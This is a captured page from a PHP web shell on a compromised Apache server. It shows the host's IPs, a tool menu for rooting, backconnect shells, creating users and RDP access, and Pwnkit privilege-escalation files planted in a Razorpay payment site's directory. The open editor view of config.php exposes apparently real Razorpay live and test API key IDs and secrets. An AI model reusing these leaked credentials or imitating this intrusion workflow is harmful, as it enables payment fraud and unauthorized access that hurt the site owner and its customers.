Linux ip-172-26-7-228 5.4.0-1103-aws #111~18.04.1-Ubuntu SMP Tue May 23 20:04:10 UTC 2023 x86_64
Apache
: 172.26.7.228 | : 3.129.249.240
Cant Read [ /etc/named.conf ]
5.6.40-24+ubuntu18.04.1+deb.sury.org+1
www-data
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
var /
www /
html /
pgadm /
razorpay /
[ HOME SHELL ]
Name
Size
Permission
Action
.pkexec
[ DIR ]
drwxr-xr-x
GCONV_PATH=.
[ DIR ]
drwxr-xr-x
checkout
[ DIR ]
drwxrwxrwx
razorpay-php
[ DIR ]
drwxrwxrwx
.editorconfig
392
B
-rwxrwxrwx
.gitignore
9
B
-rwxrwxrwx
.mad-root
0
B
-rw-r--r--
.razorpay.php
3.61
KB
-rw-r--r--
LICENSE
1.07
KB
-rwxrwxrwx
README.md
2.06
KB
-rwxrwxrwx
config.php
455
B
-rwxrwxrwx
config.php.sample
313
B
-rwxrwxrwx
error_log
6.56
MB
-rwxrwxrwx
index.html
1.19
KB
-rwxrwxrwx
pay.php
8.7
KB
-rwxrwxrwx
pwnkit
10.99
KB
-rwxr-xr-x
verify.php
10.85
KB
-rwxrwxrwx
Delete
Unzip
Zip
${this.title}
Close
Code Editor : config.php
<?php // $keyId = 'rzp_live_lVO72svmz42oDZ'; // $keySecret = 'Nj0YQdOD9dACoFSGVZysKdrd'; // $keyId = 'rzp_test_5ST9BqRn0zcxQF'; // $keySecret = '1y2LpikpOEhKeYozg6ALipxc'; $keyId = RAZORPAY_KEY_ID; $keySecret = RAZORPAY_KEY_SECRET; $displayCurrency = 'INR'; //These should be commented out in production // This is for error reporting // Add it to config.php to report any errors error_reporting(E_ALL); ini_set('display_errors', 1);
Close